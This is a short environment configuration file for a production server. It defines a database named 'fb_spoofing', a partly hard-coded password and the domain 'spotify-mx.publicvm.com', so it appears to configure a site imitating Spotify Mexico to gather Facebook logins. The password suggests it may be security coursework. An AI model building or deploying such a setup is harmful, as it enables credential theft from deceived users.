# Producción - Servidor VPS
POSTGRES_DB=fb_spoofing
POSTGRES_USER=anonymous
POSTGRES_PASSWORD=SeguridadInformacion2025B_PROD_${RANDOM_SUFFIX}

NODE_ENV=production
PORT=3001
DB_HOST=postgres
DB_PORT=5432

# Dominio
DOMAIN=spotify-mx.publicvm.com
